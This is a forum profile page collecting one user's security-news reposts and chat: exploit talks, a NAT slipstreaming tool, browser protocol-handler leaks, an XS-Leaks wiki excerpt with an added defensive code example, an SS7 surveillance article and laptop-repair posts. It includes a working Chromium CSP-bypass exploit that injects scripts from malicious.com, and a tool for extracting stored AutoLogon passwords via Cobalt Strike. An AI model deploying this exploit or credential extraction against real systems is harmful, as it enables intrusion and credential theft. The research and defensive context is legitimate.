Everything posted by Nytro

  1. This talk will reveal the iOS 13 exploits I showcased earlier on Twitter (@08Tc3wBB): an exploit chain for iOS 13.7 that relies upon a different kernel vulnerability since the 13.6 update patched the old one. I'll be talking about the root cause and techniques used during the exploit development to bypass the mitigations that are unique to iOS to ultimately get the privilege of reading and writing kernel memory.

     08Tc3wBB is a Bug Bounty Hunter and a Security Researcher.
  2. Slipstream

     This is a proof of concept for the NAT slipstreaming vulnerability discussed here.

     Building

     slipstream has no external dependencies and does not depend on CGO. You can build the executable and/or cross compile for other platforms using the go compiler with the following command:

         go build

     Usage

     slipstream will produce a single executable that is both the server and client. You must first set up the server on a remote host that is outside of your NAT:

         ./slipstream -l -lp 5060

     You can then use slipstream to connect to the host outside of your NAT and let it attempt to connect back to you:

         ./slipstream -ip <local ip> -host <remote host> -rp 5060 -lp <local port>

     Why another implementation?

     After spending many hours attempting to get the original code working with no success, I was left at a point of not knowing if my router was simply not vulnerable, I had misconfigured the code, the code was broken, or there were other implementation details stopping it from working. Eventually I was shown another implementation of the attack that skipped over the web based delivery, instead focusing just on exploitation of the ALGs. This code is heavily based on that implementation, though it provides an end to end client and server to make testing simpler and avoids using an HTTP client to send the request due to issues discovered.

     What about web based delivery?

     At the time of writing the major browser vendors (Chromium and Firefox) have since provided mitigations against this by blocking outbound connections to port 5060. It's theoretically possible that this could be bypassed by switching to a different port or attempting to use a different ALG altogether. I'm assuming SIP was chosen due to its similarity to HTTP and widespread use.

     In testing some of the higher end enterprise gear we discovered that due to slight differences (the / used in the HTTP path, the HTTP version rather than SIP/2.0, and differing headers) some networking equipment fails to parse the SIP requests generated by an HTTP client and simply drops them at the router. Given that it's been blocked by browsers and delivery is unreliable by HTTP client, no attempt was made to port the newer webscan technique for local ip discovery for web based delivery or identify a browser bypass.

     License

     MIT

     Source: https://github.com/jrozner/slipstream
  3. Leaking Browser URL/Protocol Handlers

     By Rotem Kerner | December 03, 2020
     FortiGuard Labs Threat Research Report

     Affected platforms: Windows, Linux
     Impacted parties: Chrome, Firefox and Edge
     Impact: Leaking sensitive data
     Severity level: Medium
     Assigned CVEs: CVE-2020-15680

     An important step in any targeted attack is reconnaissance. The more information an attacker can obtain on the victim, the greater the chances for a successful exploitation and infiltration. Recently, we uncovered two information disclosure vulnerabilities affecting three of the major web browsers which can be leveraged to leak out a vast range of installed applications, including the presence of security products, allowing a threat actor to gain critical insights on the target.

     In this post we will discuss what protocol handlers are and disclose two information disclosure vulnerabilities affecting three major browsers (namely Firefox, Edge and Chrome). Exploiting these vulnerabilities will enable a remote attacker to identify the presence of a vast amount of applications that may be installed on a targeted system.

     Overview - What Are Protocol Handlers?

     Generally speaking, when talking about Protocol Handlers we are referring to a mechanism which allows applications to register their own URI scheme. This enables the execution of processes through the use of URI formatted strings. The Windows OS manages custom URL handlers under the following keys:

         HKEY_CURRENT_USER\SOFTWARE\Classes\*
         HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*
         HKEY_CLASSES_ROOT\*

     When a URL Handler is invoked, the OS searches within those locations for keys containing values with the name "URL Protocol". For instance, we can use regedit to inspect the path at HKEY_CLASSES_ROOT\msteams and see that it contains the special value "URL Protocol".

     Figure 1

     Looking further into HKEY_CLASSES_ROOT\msteams\shell\open\command\ we can see the actual command that gets invoked:

     Figure 2
     Figure 3

     In this example the browser will launch Teams.exe when a URL that starts with "msteams" is clicked. Web browsers let their users click on links with non-http schemes, which results in prompting the user with a message box asking them if they want to let another application handle this URL.

     Figure 4

     Though it requires user interaction and thus poses a limited risk, it expands the attack surface beyond the browser borders. An attacker could craft a special web page which triggers another potentially vulnerable application. In some cases, such attacks may bypass protection measures such as Smart Screen and other security products. While exploring the potential of attacking the browsers through the different protocol handlers, I got curious as to whether web browsers somehow disclose what protocol handlers exist on a targeted system. The short answer is yes.

     Leaking Protocol Handlers

     In this section we disclose how Chrome, Edge and Firefox were circumvented in order to disclose which protocol handlers exist on a targeted system. It's worth mentioning that these findings are the result of manually playing with HTML/CSS components, with the emphasis on finding a difference in behavior when referring (using some elements) to existing and non-existing URL handlers. The environment I've been testing on is Windows 10, but it is fair to assume that the same vulnerabilities exist on other platforms (such as Linux and Mac).

     Leaking Firefox protocol handlers (CVE-2020-15680)

     This vulnerability has been tested on Firefox 78.0.1 (64-bit) under Windows 10. To leak the protocol handlers in Firefox we leverage differences in the way Firefox renders images sourced from existing and non-existing protocol handlers. For example, if we try to load a web page containing the following element and observe the element's styling using developer tools, we would see that the default styling for broken images generates an element with a size of 24x24, as can be seen in Figure 5.

     Figure 5

     Unlike the example above, if we try to create an image element and set its source to some non-existent handler like the following, this will result in an element with a different size of 0x0, as can be seen in Figure 6.

     Figure 6

     This difference can be measured using a simple JS script. Based on this, a malicious actor may perform a brute-force attack to disclose the different protocol handlers on a targeted system. The following example code will print whether a handler exists or not on a targeted system.

     Leaking Chrome and Edge protocol handlers

     This vulnerability has been tested on Chrome 83.0.4103.116 under Windows 10. The exploitation of this vulnerability may be less stealthy, but it still yields results equivalent to the Firefox vulnerability. The mechanism here is different from the one in Firefox: here we leverage the fact that the window loses focus whenever the user is challenged with the message box, as can be seen in Figure 7.

     Figure 7

     So, in order to detect if a given handler exists on the victim, we take the following steps. First, we dynamically generate a link that is made of the scheme we would like to detect. Then we trigger the link and detect whether the document has focus. That will work for a one time check; however, if we would like to brute force an entire list of handlers, we would have to get rid of the message box every time it pops up, or else document.hasFocus() will always return true.

     Figure 8

     The technique we came up with was to redirect the user to an entirely different domain/IP, which eliminates any previously opened message box. Figure 8 draws the general idea of how the flow should be carried out in order to work. The Protocol Handler Test page performs the actual test and saves the results to the back-end. In case the handler exists, it redirects to the "Redirect-Back Page" which exists on domain2.com. The redirection gets rid of the message box. Finally, it goes back to the Protocol Handler Test Page for the next handler test.

     Vulnerabilities Impact

     Such an information disclosure vulnerability could be exploited in several different ways. Here are some examples:

     - Identifying communication channels: By listing the handlers an attacker can get a hint as to what platforms he may use for reaching the targeted user. For instance, detecting social applications such as Slack, Skype, WhatsApp or Telegram may be used for communicating with the target.
     - General reconnaissance: A wide range of applications nowadays use custom URL handlers and can be detected using this vulnerability. Some examples: music players, IDEs, office applications, crypto-mining, browsers, mail applications, antivirus, video conferencing, virtualization, database clients, version control clients, chat clients, voice conference apps, shared storage.
     - Pre-exploitation detection: Exploit kits may leverage this information in order to identify if a potentially vulnerable application is present without exposing the vulnerability itself.
     - Detecting security solutions: Many security solutions such as AV products register protocol handlers, whose presence can be exposed by leveraging the vulnerabilities because they have custom protocol handlers installed. Attackers may use this to further customize their attack to be able to circumvent any protection mechanism set by those security solutions.
     - User fingerprinting: Reading what protocol handlers exist on a system may also be used in order to improve browser/user fingerprinting algorithms.

     Vendor Response

     Below is a table specifying the vendor responses:

     Vendor    | Vendor Response
     Mozilla   | The security team at Mozilla were quick to respond and have issued a fix for the bug - CVE-2020-15680
     Microsoft | The vendor decided not to fix the issue due to the following explanation: "This is by design (and not a security issue) - if we want to support registered protocol handler links from the browser, it seems like there'll be various ways to detect whether a link for a particular protocol handler worked or not"
     Google    | The vendor decided to treat this as a "user fingerprinting issue" rather than a security issue and are working on a patch. "The general consensus on the security team is that none of the concerns here relate to leaking user data, and that this is best handled as a fingerprinting bug"

     Summary

     In this post we uncovered a new type of information disclosure vulnerability in Chrome, Edge and Firefox and identified how attackers can leverage them to gain valuable insights which could assist them in compromising their targets. When browsers enable interaction with other applications through URL handlers, they may be easing the engagement with third party software, but they also enable a wider attack surface by giving the attacker a chance to attack the user through other applications. While Microsoft and Google currently don't consider it a security issue, we believe that being able to expose the presence of other software, including security software, on targeted devices should be prevented. With that being said, we anticipate that in the near future we shall see an increase in the number of attacks which exploit the different URL handlers through the user's web browser. FortiEDR can detect and block these browser-based exploits and provide visibility into such attempts.

     Source: https://www.fortinet.com/blog/threat-research/leaking-browser-url-protocol-handlers
  4. Chromium 83 - Full CSP Bypass (CVE-2020-6519)

         #Title: Chromium 83 - Full CSP Bypass
         #Date: 02/09/2020
         #Exploit Author: Gal Weizman
         #Vendor Homepage: https://www.chromium.org/
         #Software Link: https://download-chromium.appspot.com/
         #Version: 83
         #Tested On: Mac OS, Windows, iPhone, Android
         #CVE: CVE-2020-6519

         (function(){
             var payload = `
                 top.SUCCESS = true;
                 var o = document.createElement("object");
                 o.data = \`http://malicious.com/bypass-object-src.html\`;
                 document.body.appendChild(o);
                 var i = document.createElement("iframe");
                 i.src = \`http://malicious.com/bypass-child-src.html\`;
                 document.body.appendChild(i);
                 var s = document.createElement("script");
                 s.src = \`http://malicious.com/bypass-script-src.js\`;
                 document.body.appendChild(s);
             `;
             document.body.innerHTML += "<iframe id='XXX' src='javascript:" + payload + "'></iframe>";
             setTimeout(() => {
                 if (!top.SUCCESS) {
                     XXX.contentWindow.eval(payload);
                 }
             });
         }())

         // further information: https://github.com/weizman/CVE-2020-6519

     Source: https://www.exploit-db.com/exploits/49195?utm_source=dlvr.it&utm_medium=twitter
  5. WDAC Policy Wizard

     The Windows Defender Application Control Wizard (Version 1.6.1) enables IT professionals to build and deploy WDAC code integrity (CI) policies by wrapping the CI PowerShell cmdlets. Use this application to create new base and supplemental policies, in addition to editing and merging existing CI policies.

     Getting Started

     You can install the policy wizard by selecting the download link. Before you install the application:
     - Review the Microsoft open source license for the app.
     - Review the Getting Started instructions on the project's GitHub repository.
     - Review the change list on the Archives Page.
     Download the Installer

     What's new

     The Windows Defender App Control Wizard Version 1.6.1 offers new functionality and bug fixes. The application is updated multiple times per month. Learn more about the new features in Version 1.6.1 in the WDAC changelog.

     About the Project

     The Windows Defender App Control Wizard was created by the Microsoft WDAC feature team as part of an ongoing effort to provide enhanced tooling for professionals leveraging WDAC technologies. See the About Page for more information.

     Source: https://webapp-wdac-wizard.azurewebsites.net/
  6. DecryptAutoLogon

     This tool can extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon. I made this to be used with Cobalt Strike's execute-assembly. Compiled with .NET 3.0 (Windows Vista's default)+. Needs to be run as SYSTEM, not just as a high integrity process, because the special registry keys needed are only visible to SYSTEM and can only be decrypted by SYSTEM.

     Why?

     In order to support Kiosk mode, Windows needs to keep the user's password in a reversible format. This was being kept at HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon under "DefaultUserName" and "DefaultPassword". Autologon was updated to store the passwords in the LSA Secrets registry keys that are only visible to SYSTEM. keithga provided a binary that popped a message box but no source code or command line version.

     How it works

     Through pInvoke calls:
     - LsaOpenPolicy()
     - LsaRetrievePrivateData()

     Credits

     - Reverse engineered this: https://keithga.wordpress.com/2013/12/19/sysinternals-autologon-and-securely-encrypting-passwords/
     - Copied and pasted EVERYTHING from here: https://www.pinvoke.net/default.aspx/advapi32/LsaOpenPolicy.html
     - Icon from: https://icon-icons.com/icon/lock-secure-password/99595
     - SysInternals: https://docs.microsoft.com/en-us/sysinternals/downloads/autologon

     So thanks to those who actually did the work: keithga, frohwalt

     Download Compiled Version HERE

     Source: https://github.com/securesean/DecryptAutoLogon
  7. XS-Leaks Wiki

     Overview

     Cross-site leaks (aka XS-Leaks, XSLeaks) are a class of vulnerabilities derived from side-channels [1] built into the web platform. They take advantage of the web's core principle of composability, which allows websites to interact with each other, and abuse legitimate mechanisms [2] to infer information about the user. One way of looking at XS-Leaks is to highlight their similarity with cross-site request forgery (CSRF) [3] techniques, with the main difference being that instead of allowing other websites to perform actions on behalf of a user, XS-Leaks can be used to infer information about a user.

     Browsers provide a wide variety of features to support interactions between different web applications; for example, they permit a website to load subresources, navigate, or send messages to another application. While such behaviors are generally constrained by security mechanisms built into the web platform (e.g. the same-origin policy), XS-Leaks take advantage of small pieces of information which are exposed during interactions between websites. The principle of an XS-Leak is to use such side-channels available on the web to reveal sensitive information about users, such as their data in other web applications, details about their local environment, or internal networks they are connected to.

     Cross-site oracles

     The pieces of information used for an XS-Leak usually have a binary form and are referred to as "oracles". Oracles generally answer with YES or NO to cleverly prepared questions in a way that is visible to an attacker. For example, an oracle can be asked: Does the word secret appear in the user's search results in another web application? This question might be equivalent to asking: Does the query ?query=secret return an HTTP 200 status code? Since it is possible to detect the HTTP 200 status code with Error Events, this has the same effect as asking: Does loading a resource from ?query=secret in the application trigger the onload event? The above query could be repeated by an attacker for many different keywords, and as a result the answers could be used to infer sensitive information about the user's data. Browsers provide a wide range of different APIs that, while well-intended, can end up leaking small amounts of cross-origin information. They are described in detail throughout this wiki.

     Example

     Websites are not allowed to directly access data on other websites, but they can load resources from them and observe the side effects. For example, evil.com is forbidden from explicitly reading a response from bank.com, but evil.com can attempt to load a script from bank.com and determine whether or not it successfully loaded.

     Suppose that bank.com has an API endpoint that returns data about a user's receipt for a given type of transaction. evil.com can attempt to load the URL bank.com/my_receipt?q=groceries as a script. By default, the browser attaches cookies when loading resources, so the request to bank.com will carry the user's credentials. If the user has recently bought groceries, the script loads successfully with an HTTP 200 status code. If the user hasn't bought groceries, the request fails to load with an HTTP 404 status code, which triggers an Error Event. By listening to the error event and repeating this approach with different queries, the attacker can infer a significant amount of information about the user's transaction history.

     In the example above, two websites of two different origins (evil.com and bank.com) interacted through an API that browsers allow websites to use. This interaction didn't exploit any vulnerabilities in the browser or in bank.com, but it still allowed evil.com to gain information about the user's data on bank.com.

     Root cause of XS-Leaks

     The root cause of most XS-Leaks is inherent to the design of the web. Oftentimes applications are vulnerable to some cross-site information leaks without having done anything wrong. It is challenging to fix the root cause of XS-Leaks at the browser level because in many cases doing so would break existing websites. For this reason, browsers are now implementing various Defense Mechanisms to overcome these difficulties. Many of these defenses require websites to opt in to a more restrictive security model, usually through the use of certain HTTP headers (e.g. Cross-Origin-Opener-Policy: same-origin), which often must be combined to achieve the desired outcome.

     We can distinguish different sources of XS-Leaks, such as:
     - Browser APIs (e.g. Frame Counting and Timing Attacks)
     - Browser implementation details and bugs (e.g. Connection Pooling and typeMustMatch)
     - Hardware bugs (e.g. Speculative Execution Attacks [4])

     A little bit of history

     XS-Leaks have long been part of the web platform; timing attacks to leak information about the user's web activity have been known since at least 2000. This class of issues has steadily attracted more attention [5] as new techniques were found to increase their impact. In 2015, Gelernter and Herzberg published "Cross-Site Search Attacks" [6] which covered their work on exploiting timing attacks to implement high impact XS-Search attacks against web applications built by Google and Microsoft. Since then, more XS-Leak techniques have been discovered and tested. Recently, browsers have implemented a variety of new defense mechanisms that make it easier to protect applications from XS-Leaks.

     About this wiki

     This wiki is meant to both introduce readers to XS-Leaks and serve as a reference guide for experienced researchers exploiting XS-Leaks. While this wiki contains information on many different techniques, new techniques are always emerging. Improvements, whether they add new techniques or expand existing pages, are always appreciated! Find out how you can contribute to this wiki and view the list of contributors in the Contributions article.

     References

     [1] Side Channel Vulnerabilities on the Web - Detection and Prevention
     [2] In some cases, these features are maintained to preserve backwards compatibility. But, in other cases, new features are added to browsers regardless of the fact that they introduce potential cross-site leaks (e.g. Scroll to Text Fragment), as the benefits are considered to outweigh the downsides.
     [3] Cross Site Request Forgery (CSRF)
     [4] Meltdown and Spectre
     [5] Browser Side Channels
     [6] Cross-Site Search Attacks

     Source: https://xsleaks.dev/#xs-leaks-wiki
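     As an added example in JavaScript (not part of the wiki text or of this post): the bank.com/my_receipt?q=groceries oracle from the wiki's example, modelled as a request handler, beside a hardened handler whose response looks identical to a cross-site script load whether or not a receipt exists. The Sec-Fetch-Site request header (Fetch Metadata) used for the first-party check, and the makeRequest and scriptLoadOutcome helpers, are assumptions of this example rather than anything the wiki excerpt states.

```javascript
// Constructed sample data standing in for the user's transaction history.
const SAMPLE_RECEIPTS = { groceries: { total: 42.17 }, fuel: { total: 60.0 } };

// Minimal request model (assumed helper). `secFetchSite` mirrors the browser's
// Sec-Fetch-Site header: "same-origin", "same-site", "cross-site" or "none".
function makeRequest(query, secFetchSite = "cross-site") {
  return { query, headers: { "sec-fetch-site": secFetchSite } };
}

// Leaky handler: 200 when a receipt exists, 404 otherwise. The status code is
// exactly the YES/NO oracle the wiki describes: a cross-site <script src=...>
// fires onload on 200 and onerror on 404, and cookies ride along by default.
function leakyReceiptHandler(req, receipts = SAMPLE_RECEIPTS) {
  const receipt = receipts[req.query];
  if (!receipt) return { status: 404, headers: {}, body: "" };
  return {
    status: 200,
    headers: { "content-type": "application/json" },
    body: JSON.stringify(receipt),
  };
}

// Hardened handler. Three independent measures; each alone removes the
// status-based oracle, together they also close the neighbouring channels:
//  1. Cross-site requests (Fetch Metadata) are refused before the lookup runs,
//     so for an attacker-initiated load the answer never depends on user data.
//  2. The lookup result travels in the body, never in the status code.
//  3. Cross-Origin-Resource-Policy plus nosniff make the browser block, or
//     refuse to execute as script, any cross-origin load of this response.
function hardenedReceiptHandler(req, receipts = SAMPLE_RECEIPTS) {
  const uniformHeaders = {
    "content-type": "application/json",
    "cross-origin-resource-policy": "same-origin",
    "x-content-type-options": "nosniff",
  };
  if (req.headers["sec-fetch-site"] === "cross-site") {
    return {
      status: 403,
      headers: uniformHeaders,
      body: JSON.stringify({ error: "cross-site request refused" }),
    };
  }
  const receipt = receipts[req.query] || null;
  return {
    status: 200,
    headers: uniformHeaders,
    body: JSON.stringify({ found: receipt !== null, receipt }),
  };
}

// Simulates what a cross-site attacker page can observe from a <script> load:
// only "load" or "error", never the body. The error event fires for non-2xx
// responses, for responses CORP blocks, and for nosniff responses whose
// Content-Type is not a JavaScript type.
function scriptLoadOutcome(response) {
  if (response.status < 200 || response.status >= 300) return "error";
  if (response.headers["cross-origin-resource-policy"] === "same-origin") return "error";
  const type = response.headers["content-type"] || "";
  if (response.headers["x-content-type-options"] === "nosniff" && !/javascript/.test(type)) {
    return "error";
  }
  return "load";
}

// An endpoint is an oracle if the attacker-observable outcome differs between
// a query that matches user data and one that does not.
function leaksViaScriptLoad(handler, presentQuery, absentQuery) {
  const hit = scriptLoadOutcome(handler(makeRequest(presentQuery)));
  const miss = scriptLoadOutcome(handler(makeRequest(absentQuery)));
  return hit !== miss;
}

console.log("leaky handler leaks:", leaksViaScriptLoad(leakyReceiptHandler, "groceries", "jewellery"));
console.log("hardened handler leaks:", leaksViaScriptLoad(hardenedReceiptHandler, "groceries", "jewellery"));
```

     The hardened handler still serves the first-party page normally (a same-origin request for "groceries" gets a 200 with found: true), which is the point: the fix changes what a cross-site observer can distinguish, not what the application's own pages receive.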
  8. This video is an explanation of a prototype pollution vulnerability in Kibana that, in a super cool and very creative way, was used to achieve remote code execution in the Kibana software.

     Blogpost: https://research.securitum.com/protot...
     Researcher's twitter: https://twitter.com/SecurityMB
     Follow me on twitter: https://twitter.com/gregxsunday

     Timestamps:
     00:00 Intro
     00:34 Prototype pollution
     02:27 Vulnerability discovery
     04:14 Exploitation

     #rce #prototypePollution #cve-2019-7609
  9. Update Faker: A website that shows "update screen" animations in your browser, so you can put the browser in fullscreen and prank friends. https://updatefaker.com/ (F11)
  10. You might manage it with qemu, but if it isn't something ready-made, it could take you some time to get it working.
  11. Yes, that's exactly the video I watched. It didn't seem that hard. Well, it's not exactly rocket science, but I suppose it takes a bit more dexterity, patience and practical experience to do something like that.
  12. Yes, what you say makes sense, but a lot of it is beyond me. I'll wait to see what the service people say; they seem to be ok and to know what they're doing. In any case, I have a backup of my data, so it's nothing critical for me, which is why I'm not too worried. I hope there's no short circuit in there. The thing is, there are 3 "rainbow" connectors (I think) and at least one of them, the keyboard one, I may not have inserted properly, because I had broken off a small piece of plastic that held it in place. I put it back more or less ok, but who knows. I'll keep looking at tutorials on YouTube, maybe I'll pick something up.
  13. I didn't have to remove any cable from the monitor, only some connectors that went to the keyboard/touchpad. Now, I hope I put them back correctly. But it's fine; if there's a short circuit and something catches fire, it catches fire at the service shop.
  14. Yes, I think it's the first point. I tried to move them gently but it didn't work. Oh, there was another strange thing. When I pressed gently on the keyboard, at the top, there was a sound as if something was touching a fan. Melting shouldn't be a problem, since I detached the whole keyboard part and "worked" like that. Worst case I completely wreck the keyboard/touchpad on this side. I should mention this isn't my first experience of this kind. On my previous laptop I also tried something and it didn't turn out well either... Conclusion: I'll mind my own business and do what I'm good at. I will NOT get involved in hardware problems anymore, maybe only if it's something extremely simple, but even then I don't feel like risking it.
  15. Yes, interesting idea. I was wondering how it decrypts TLS traffic, but it's mentioned what it can capture and TLS isn't among them; there's no way it could have.
  16. Hi, I had a problem with the keyboard on an Asus RoG G750, an older one (but still going strong) that I own, and I decided to replace it. I ordered just the keyboard (it could have come with the palmrest too, but I figured it wasn't worth it) and tried to fit it. My hardware skills are close to 0 and my dexterity doesn't help either. But I have a piece of advice for you: don't do this! The disassembly part isn't that hard, but as every time I ended up with some extra screws. I think laptop makers want to make fun of us non-professionals and add extra screws; I don't know what's wrong with them. Replacing the keyboard, however, wasn't as easy as I expected: it has a nasty mechanism where you have to melt lots of little bits of plastic with a soldering gun to get it out, and then you have to put melted plastic back. Having a soldering gun, I filled the house with smoke and got the old one off. I "mounted" the new one but didn't have the patience to put melted plastic into 200 little holes. That meant the keyboard doesn't sit as it should; it sits inside. Now comes the dumbest part: I assemble the laptop, plug in as best I can some crappy "things" that connect from the palmrest and keyboard, put everything together (in theory) and turn it on. I'm happy the power button works, so at least something works, but it seems... the monitor doesn't turn on; it stays black. Does anyone have any idea what it could be? I didn't touch the wires going to the monitor and tried to be careful in general. I can't find any explanation. I would understand if the new keyboard or the touchpad didn't work, but I really didn't expect the screen not to turn on. PS: The laptop is now at the "hospital", at a service shop. I hope they figure it out, but I'm curious what I did there.
  17. Hi, why do you want to learn programming? Do you want to make web applications, for example? I think that would be a good start. I'd say start by learning HTML and CSS. They aren't programming languages, but they're necessary. Then I think you can learn JavaScript and combine them. I think that would be good for a start. To learn: read a book. Or two. There are books that cover these topics together, or separately. If you don't want to use books, look for some tutorials, but make sure you find good ones. There are billions on this subject. All you need to know is a little English.
  18. HUMBLE BOOK BUNDLE: HACKING 101 BY NO STARCH PRESS

     We've teamed up with No Starch Press for our newest bundle with a wealth of great ebooks for you to enjoy!! Get ebooks like Metasploit, Web Security for Developers, Real-World Bug Hunting, and Black Hat Go. Plus, your purchase will support the National Coalition Against Censorship and the No Starch Press Foundation!

     US$655 worth of awesome stuff, pay €1 or more, DRM-free, multi-format. 13,165 bundles sold. Time left: 17 days.

     Pay €1 to unlock:
     - Hacking: The Art of Exploitation, 2nd Edition
     - The Car Hacker's Handbook: A Guide for the Penetration Tester
     - Metasploit: A Penetration Tester's Guide

     Pay €6.77 or more to also unlock:
     - Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software
     - Penetration Testing: A Hands-On Introduction to Hacking
     - Attacking Network Protocols: A Hacker's Guide to Capture, Analysis, and Exploitation
     - Practical Packet Analysis, 3rd Edition: Using Wireshark to Solve Real-World Network Problems

     Pay €8.46 or more to also unlock:
     - Practical Binary Analysis: Build Your Own Linux Tools for Binary Instrumentation, Analysis, and Disassembly
     - Malware Data Science: Attack Detection and Attribution
     - Linux Basics for Hackers: Getting Started with Networking, Scripting, and Security in Kali
     - The Linux Command Line, 2nd Edition: A Complete Introduction
     - Serious Cryptography: A Practical Introduction to Modern Encryption

     Pay €15.23 or more to also unlock:
     - Rootkits and Bootkits: Reversing Modern Malware and Next Generation Threats
     - Black Hat Go: Go Programming For Hackers and Pentesters
     - The Hardware Hacker: Adventures in Making and Breaking Hardware
     - Web Security for Developers: Real Threats, Practical Defense
     - Foundations of Information Security: A Straightforward Introduction
     - Real-World Bug Hunting: A Field Guide to Web Hacking

     Supports charity: National Coalition Against Censorship, The No Starch Press Foundation

     Source: https://www.humblebundle.com/books/hacking-101-no-starch-press-books
  19. We have nothing to worry about, because our enemies don't know that we don't have a nuclear bomb. Search YouTube for "bomba nucleara" (nuclear bomb) to convince yourselves.
  20. Fun stuff: Attention! Phishing is becoming more and more realistic!
  21. Most likely there won't be any. Temporarily. The "metals" manufacturing industry will grow, along with agriculture so we don't starve, and in general those "essential things" for survival. But I don't think it will come to that; it's not the case in the next few years. Maybe when the planet's resources run out, I don't know. I wouldn't worry about a job but about survival. We go to the countryside and eat zacusca for 2-3 years until it runs out.
  22. Fun stuff: Algorithms tutorial
  23. Maybe the guy came here to learn; let's try to help him.
     - Linux is an operating system, like the Windows you have. It helps you do something useful with your computer/laptop, so that it isn't just a brick.
     - On Linux, as on Windows, you can create multiple users. Just as you have an account on Facebook/RST or other platforms, you can have an account, a user, on Linux.
     - Operating system users, less commonly on Windows in the "home" environment, can be limited. That is, a normal user cannot, for example, install programs.
     - These limitations can exist on Windows too. But there is a user, Administrator, who has full permissions over the operating system (actually it isn't Administrator but NT Authority/System, but the idea is the same). This user, Administrator, can install programs, create or delete users and do many other things.
     - On Linux this special account, with total privileges over the operating system, is called "root". As we Romanians would say, this root "cuts and hangs" (calls all the shots).

     Just as you have Windows on your computer/laptop and an account with Administrator privileges, you could install Linux instead of Windows and have "root". But you don't need to delete Windows; technology has evolved and you can run pretty much any operating system, including Linux, in what's called a "Virtual Machine". That is, you download a program like VMWare Player or VirtualBox and these, "inside" them, let you install another operating system without losing anything you have. So you can simply and quickly install Linux in a virtual machine. Search Google for "How to install Ubuntu", where Ubuntu is a version of Linux that's easier to understand, with graphical interfaces. And that's how you can learn Linux.

     Now that we've established what "root" is, we can move on to your problem. You want this root for a certain reason. What would that be? If you found some tutorial on "hacking like a boss, how to make billions" and saw this "root" there, you should pick another source of information. I didn't think, or at least I hoped, that this garbage from 20 years ago was still in fashion.

     As an addition: just as you install a virtual machine with Linux, many people have Linux systems exposed on the Internet. RST Forums is an example. It's a server running Linux, exposed on the Internet. Which means that we, the RST team, can connect to it and have "root". What do we do with it? We make sure the forum works as it should, that it's up to date, and we hack NASA 2-3 times a week. Ok, I was joking about the NASA part. So we don't do anything "interesting". What can happen is that "bad guys" on the Internet guess the root password (don't bother with RST, it won't work; nobody knows that my dog's name is Rex, which is also the "root" password). These people gain access to servers on the Internet with "root" (full) or more limited access. What can they do? Access whatever data is on that server. What else? Use it to carry out various idiotic attacks, like attacking other servers, sending spam emails or lots of other rubbish.

     When I said you can buy a root from DigitalOcean or Vultr for $5, I wasn't joking. For $5 you can buy a VPS (Virtual Private Server), i.e. a virtual machine exposed on the Internet; you can connect to it, log in as "root" and do whatever you want with it. It's the simplest way. But if you want to do "nasty stuff", the VPS will most likely be shut down quickly. My suggestion is to think about whether it's "worth it". Will millions of dollars land on you if you do this? Probably not. It comes with some risks; is it worth it? Probably not. Do you know well what you're doing and how to avoid getting caught? Probably not. So, in conclusion, first learn what it's actually about and you'll realise it's "garbage".
  24. You buy one for $5 from DigitalOcean, Vultr or other VPS providers. You get the password by email or set it from the web interface, log in over SSH and start "hacking".
  25. This Surveillance Tool Can Find You With Just Your Telephone Number — And These 25 Countries Bought It, Warn Researchers

Thomas Brewster, Forbes Staff (Cybersecurity). Associate editor at Forbes, covering cybercrime, privacy, security and surveillance.

A surveillance technology that can identify the location of a phone anywhere in the world in just seconds with only a telephone number has been sold to 25 countries, some with chequered records on human rights, according to research released Tuesday.

The tech was supplied by the Israeli business Circles, claimed Citizen Lab, a University of Toronto organization that has long tracked the activities of surveillance companies. Circles is a sister company of NSO Group, an iPhone and Android spyware developer that is currently being sued by Facebook over attacks on the WhatsApp accounts of 1,400 users and has been criticized for selling to nations who went on to spy on activists, journalists and other citizens.

According to Citizen Lab, the Circles tracking tool was detected in both Western, democratic countries and nations with poor human rights records. The full list, according to Citizen Lab and neither confirmed nor denied by Circles, included: Australia, Belgium, Botswana, Chile, Denmark, Ecuador, El Salvador, Estonia, Equatorial Guinea, Guatemala, Honduras, Indonesia, Israel, Kenya, Malaysia, Mexico, Morocco, Nigeria, Peru, Serbia, Thailand, the United Arab Emirates (U.A.E.), Vietnam, Zambia, and Zimbabwe.

(Image caption: Technology made by Circles, an Israeli intelligence provider, can find a person's phone with just their number. As many as 25 countries use it, leading to concerns about ethics. Getty)

The technique used by the Circles snooping tech is known as Signaling System 7 (SS7) exploitation, a powerful yet difficult-to-detect tool in government spy arsenals. It's named after the portion of the telecoms network that deals with cross-border functionality and billing. When, for instance, you travel to another country, the SS7 network is used to move your phone over to a partner telecoms provider and adjust billing accordingly. But should a surveillance vendor have access to SS7 networks, either via hacking or acquiring it, they can send commands to a subscriber's "home network" falsely indicating the subscriber is roaming. That will, in turn, reveal their location, though only the coordinates of the cell tower closest to the phone.

It may also be possible to intercept calls and texts through SS7 exploitation, though Circles technology is only for location detection, according to two industry sources. (According to trademark filings, it does have a technology called PixCell for "tapping into or intercepting targets' wireless, telephone, computer, and internet communications.")

If such a significant number of countries have bought access to the Circles tool, it would indicate that all can locate a phone, and its owner, at rapid speed. If used by countries with lax rule of law and human rights controls, it could help repressive government surveillance agencies track targets across borders, without the need for a warrant, Citizen Lab researcher Bill Marczak warned. Marczak noted that one of the main selling points of the Circles tool was that it didn't need cooperation from a telecoms company.

Many of the countries listed as likely Circles customers have a track record of using surveillance tools against dissidents and activists, Citizen Lab claimed. Forbes previously revealed Circles' sales to Mexico, whilst others had reported on deals with the U.A.E., where it was alleged the company's tools were used to carry out surveillance on the Emir of Qatar and the prime minister of Lebanon. The U.A.E., for instance, allegedly targeted the now imprisoned activist Ahmed Mansoor with malware from at least three different companies, NSO Group included, before arresting him in 2017. Mexico, meanwhile, "serially abused NSO Group's Pegasus spyware" in targeting at least 25 reporters, human rights defenders, and the families of individuals killed or disappeared by cartels, according to previous Citizen Lab research.

NSO has always stated that it works for legitimate government agencies on investigations into the worst kinds of crimes, and has an ethics committee that reviews contracts, though it cannot comment on the identity of its customers. "Given Circles' affiliation with NSO Group, and repeated spyware abuse by NSO customers, it's disappointing to see Western governments patronizing the company," added Marczak.

